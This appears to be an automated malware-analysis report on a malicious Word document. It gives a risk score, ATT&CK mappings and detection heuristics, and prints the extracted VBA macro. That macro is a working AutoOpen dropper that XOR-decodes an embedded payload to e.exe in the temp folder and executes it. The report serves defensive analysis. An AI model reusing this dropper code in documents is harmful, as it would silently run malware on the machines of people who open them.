MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses CreateObject to access the scripting.filesystemobject, reads the document's content, XORs it with a hardcoded key, and writes the result to a file named 'e.exe' in the temporary directory. It then executes this file using Shell(). This indicates a downloader or dropper functionality.
Heuristics 8
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 1,030,720 bytes but its declared streams total only 25,309 bytes — 1,005,411 bytes (98%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1173 bytes |
SHA-256: 58c0f68b486c20ac55d7c323896fc184eef098d10b563efbf9b166c34d8b553c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Макрос создан 18/01/2019 User"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name):
Dim a(1000000 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte:
Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7:
Dim key(5) As Byte
key(0) = 1: key(1) = 2: key(2) = 3: key(3) = 4: key(4) = 5:
j = 0
For i = 0 To (e.Size - s - 1)
If (5 = j) Then j = 0
a(i) = b(s + i) Xor key(j)
j = j + 1
Next
Open (f.getspecialfolder(2) + "\\e.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecialfolder(2) + "\\e.exe")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.